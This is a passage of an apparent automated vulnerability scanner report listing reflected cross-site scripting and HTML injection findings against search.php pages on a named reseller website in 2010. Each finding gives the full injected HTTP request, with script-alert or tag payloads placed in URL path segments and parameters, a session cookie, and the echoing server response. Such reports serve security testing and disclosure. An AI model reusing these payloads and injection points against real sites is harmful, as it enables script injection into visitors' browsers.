Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbb125<script>alert(1)</script>5aa1aa6c11f/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2512. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39ce5<script>alert(1)</script>9f5a48dbf45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3739ce5<script>alert(1)</script>9f5a48dbf45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3739ce5<script>alert(1)</script>9f5a48dbf45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2513. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69ccd<script>alert(1)</script>f0bb5199292 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes69ccd<script>alert(1)</script>f0bb5199292/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes69ccd<script>alert(1)</script>f0bb5199292/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2514. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2fb7<script>alert(1)</script>0832bcbea7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosd2fb7<script>alert(1)</script>0832bcbea7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosd2fb7<script>alert(1)</script>0832bcbea7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2515. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd34d<script>alert(1)</script>60dd9df8565 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/imagesfd34d<script>alert(1)</script>60dd9df8565/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/imagesfd34d<script>alert(1)</script>60dd9df8565/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2516. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 37f3b<script>alert(1)</script>98c4d08ab5e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating37f3b<script>alert(1)</script>98c4d08ab5e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating37f3b<script>alert(1)</script>98c4d08ab5e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2517. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 456f1<script>alert(1)</script>2bb3f0409e2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/search.php456f1<script>alert(1)</script>2bb3f0409e2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php456f1<script>alert(1)</script>2bb3f0409e2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2518. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 318d8<a>6ff1fb15625 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search318d8<a>6ff1fb15625&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search318d8<a>6ff1fb15625&opt=2 was not found on this server.</p>
...[SNIP]...

2.2519. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b96a<a>97743e31a54 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...2b96a<a>97743e31a54&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...2b96a<a>97743e31a54&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2520. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>b00bc1775cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&760f3<script>alert(1)</script>b00bc1775cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&760f3<script>alert(1)</script>b00bc1775cf=1 was not found on this server.</p>
...[SNIP]...

2.2521. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 29652<a>a566a5bf1b8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=229652<a>a566a5bf1b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=229652<a>a566a5bf1b8 was not found on this server.</p>
...[SNIP]...

2.2522. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ff15<script>alert(1)</script>09641e5c697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1ff15<script>alert(1)</script>09641e5c697/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1ff15<script>alert(1)</script>09641e5c697/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2523. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c8b3<script>alert(1)</script>73e62d3ff43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/372c8b3<script>alert(1)</script>73e62d3ff43/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/372c8b3<script>alert(1)</script>73e62d3ff43/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2524. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 48355<script>alert(1)</script>73d43b3f947 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes48355<script>alert(1)</script>73d43b3f947/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes48355<script>alert(1)</script>73d43b3f947/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2525. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dbcd0<script>alert(1)</script>bfd0acfd56a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosdbcd0<script>alert(1)</script>bfd0acfd56a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosdbcd0<script>alert(1)</script>bfd0acfd56a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2526. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 594ae<script>alert(1)</script>ae51c32dd60 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images594ae<script>alert(1)</script>ae51c32dd60/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images594ae<script>alert(1)</script>ae51c32dd60/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2527. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5f2a7<script>alert(1)</script>c3ae6b8d583 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/search.php5f2a7<script>alert(1)</script>c3ae6b8d583?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php5f2a7<script>alert(1)</script>c3ae6b8d583?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2528. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6753<a>9b5ea01f9ef was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Searcha6753<a>9b5ea01f9ef&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Searcha6753<a>9b5ea01f9ef&opt=2 was not found on this server.</p>
...[SNIP]...

2.2529. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
